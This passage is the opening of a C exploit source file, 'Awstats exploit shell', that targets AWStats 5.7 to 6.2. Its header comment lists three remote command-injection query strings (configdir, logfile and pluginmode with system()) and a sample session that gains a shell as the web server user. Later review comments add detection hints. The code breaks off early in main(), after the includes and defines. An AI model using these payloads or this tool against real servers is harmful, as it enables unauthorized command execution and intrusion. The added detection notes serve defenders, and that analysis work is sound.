1 /*
2 * Awstats exploit "shell"
3 * code by omin0us
4 * omin0us208 [at] gmail [dot] com
5 * dtors security group
6 * .:( http://dtors.ath.cx ):.
7 *
8 * Vulnerability reported by iDEFENSE
9 * pluginmode bug has been found by GHC team.
10 *
11 * The awstats vulnerability that was discovered allows
12 * a user to execute arbitrary commands on the
13 * remote server with the privileges of the httpd process.
14 *
15 * This exploit combines all three methods of exploitation
16 * and acts as a remote "shell", parsing all returned
17 * data to display command output and running in a loop
18 * for continuous access.
19 *
20 * bash-2.05b$ awstats_shell localhost
21 * Awstats 5.7 - 6.2 exploit Shell 0.1
22 * code by omin0us
23 * dtors security group
24 * .: http://dtors.ath.cx :.
25 * --------------------------------------
26 * select exploit method:
27 * 1. ?configdir=|cmd}
28 * 2. ?update=1&logfile=|cmd|
29 * 3. ?pluginmode=:system("cmd");
30 *
31 * method [1/2/3]? 1
32 * starting shell...
33 * (ctrl+c to exit)
34 * sh3ll> id
35 * uid=80(www) gid=80(www) groups=80(www)
36 * DTORS_STOP
37 * sh3ll> uname -a
38 *
39 * FreeBSD omin0us.dtors.ath.cx 4.8-RELEASE FreeBSD 4.8-RELEASE #3: Mon Oct 11
40 * 19:34:01 EDT 2004 omin0us@localhost:/usr/src/sys/compile/DTORS i386
41 * DTORS_STOP
42 * sh3ll>
43 *
44 * this is licensed under the GPL
45 */
46
47 #include <stdio.h>
48 #include <stdlib.h>
49 #include <string.h>
50 #include <unistd.h>
51 #include <sys/types.h>
52 #include <sys/socket.h>
53 #include <netinet/in.h>
54 #include <netdb.h>
55
/*
 * Compile-time settings and the one forward declaration used by main().
 * main() is only partly visible in this listing, so how each value is
 * consumed is hedged below rather than stated as fact.
 */
/* TCP port for the outgoing connection; presumably the target web server's
 * HTTP port -- confirm where addr is filled in inside main(). */
56 #define PORT 80
/* Presumably the size of the buffer holding one operator-typed command.
 * NOTE(review): fixed size; the code that fills it must bound the read. */
57 #define CMD_BUFFER 512
/* Presumably the size of the buffer receiving the HTTP response.
 * NOTE(review): fixed size fed by remote data; the receive loop must cap
 * each read at the remaining space and keep room for the terminator. */
58 #define IN_BUFFER 10000
/*
 * Sentinel strings. The sample session in the file header shows DTORS_STOP
 * printed after each command's output, so these presumably bracket command
 * output inside the returned page (the parsing code is outside this view).
 * Detection: both literals are distinctive. Their presence in response
 * bodies from an AWStats host -- or in access logs, if they are also sent in
 * the request, which is not visible here -- is a strong indicator of this
 * tool, alongside the configdir, logfile and pluginmode query parameters
 * listed in the header carrying pipe characters or a system( call.
 */
59 #define MAGIC_START "DTORS_START"
60 #define MAGIC_STOP "DTORS_STOP"
61
/* Forward declaration; the definition is not within this part of the
 * listing. Takes the argument vector, presumably to print the program name
 * in a usage message -- confirm against the definition. */
62 void usage(char *argv[]);
63
64 int main(int argc, char *argv[]){
65
66
FILE *output;
67
int sockfd;
68
struct sockaddr_in addr;
69
struct hostent *host;
70
char *host_name=NUL